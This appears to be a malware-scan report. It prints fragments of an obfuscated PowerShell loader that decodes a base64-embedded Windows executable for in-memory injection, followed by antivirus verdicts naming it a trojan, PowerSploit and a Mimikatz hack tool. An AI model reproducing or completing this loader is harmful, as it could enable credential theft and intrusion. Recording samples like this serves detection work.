${00011111010010110} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VABWAHEAUQBBAEEATQBBAEEAQQBBAEUAQQBBAEEAQQAvAC8AOABBAEEATABnAEEAQQBBAEEAQQBBAEEAQQBBAFEAQQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQBBAEMAQQBFAEEAQQBBADQAZgB1AGcANABBAHQAQQBuAE4ASQBiAGcAQgBUAE0AMABoAFYARwBoAHAAYwB5AEIAdwBjAG0AOQBuAGMAbQBGAHQASQBHAE4AaABiAG0ANQB2AGQAQwBCAGkAWgBTAEIAeQBkAFcANABnAGEAVwA0AGcAUgBFADkAVABJAEcAMQB2AFoARwBVAHUARABRADAASwBKAEEAQQBBAEEAQQBBAEEAQQBBAEMARwBxAEsAVwA4AHcAcwBuAEwANwA4AEwASgB5ACsALwBDAHkAYwB2AHYAeQA3AEYAWQA3ADgAegBKAHkAKwA5ADIAbwA4ADcAdQAyADgAbgBMADcAMwBhAGoAegArADcATwB5AGMAdgB2AGQAcQBQAEkANwBzAFAASgB5ACsAOQAyAG8AOAByAHUAeABzAG4ATAA3ADYAZQB2AHkAdQA3AE4AeQBjAHYAdgB3AHMAbgBLADcANgBuAEoAeQArACsAMgBvAHMATAB1AHcAYwBuAEwANwA3AGEAaQBOAE8ALwBEAHkAYwB2AHYAdwBzAGwAYwA3ADgAUABKAHkAKwArADIAbwBzAG4AdQB3ADgAbgBMADcAMQBKAHAAWQAyAGoAQwB5AGMAdgB2AEEAQQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQBBAEE
if ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -eq 8)
[Byte[]]${_00000000110100000} = [Byte[]][Convert]::FromBase64String(${00010111111101011})
[Byte[]]${_00000000110100000} = [Byte[]][Convert]::FromBase64String(${00011111010010110})
_00011001001110011 -_00000000110100000 ${_00000000110100000}
Antivirus Signature
Bkav Clean
Lionic Trojan.Script.PwShell.4!c
tehtris Clean
Cynet Clean
CTX powershell.trojan.pwshell
CAT-QuickHeal Clean
Skyhigh BehavesLike.PS.Dropper.br
ALYac Generic.PwShell.RefA.4157A733
Malwarebytes Clean
Zillya Clean
CrowdStrike Clean
K7GW Clean
K7AntiVirus Clean
Baidu Clean
VirIT Clean
Symantec ML.Attribute.HighConfidence
ESET-NOD32 PowerShell/Agent.ASP
TrendMicro-HouseCall Clean
Avast Other:Malware-gen [Trj]
ClamAV Win.Trojan.PowerMacro-5942596-0
Kaspersky HEUR:Trojan.Script.Generic
BitDefender Generic.PwShell.RefA.4157A733
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Generic.PwShell.RefA.4157A733
Tencent Script.Trojan.Generic.Tgil
Sophos ATK/PowSploit-C
F-Secure Clean
DrWeb Clean
VIPRE Generic.PwShell.RefA.4157A733
TrendMicro Clean
CMC Clean
Emsisoft Generic.PwShell.RefA.4157A733 (B)
huorong HackTool/PS.Mikatz.b
FireEye Generic.PwShell.RefA.4157A733
Jiangmin Clean
Varist ABTrojan.DKQE-
Avira Clean
Fortinet Clean
Antiy-AVL Clean
Kingsoft Script.Trojan.Generic.a
Gridinsoft Clean
Xcitium Clean
Arcabit Generic.PwShell.RefA.4157A733
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan.Script.Generic
Microsoft Trojan:PowerShell/Casdet!rfn
Google Detected
AhnLab-V3 Clean
Acronis Clean
McAfee Clean
TACHYON Clean
VBA32 Clean
Zoner Clean
Rising Trojan.Injector/PS!1.ACC3 (CLASSIC)
Yandex Clean
Ikarus Trojan.PowerShell.Agent
MaxSecure Clean
GData Generic.PwShell.RefA.4157A733
AVG Other:Malware-gen [Trj]
Panda Clean
alibabacloud Clean
No IRMA results available.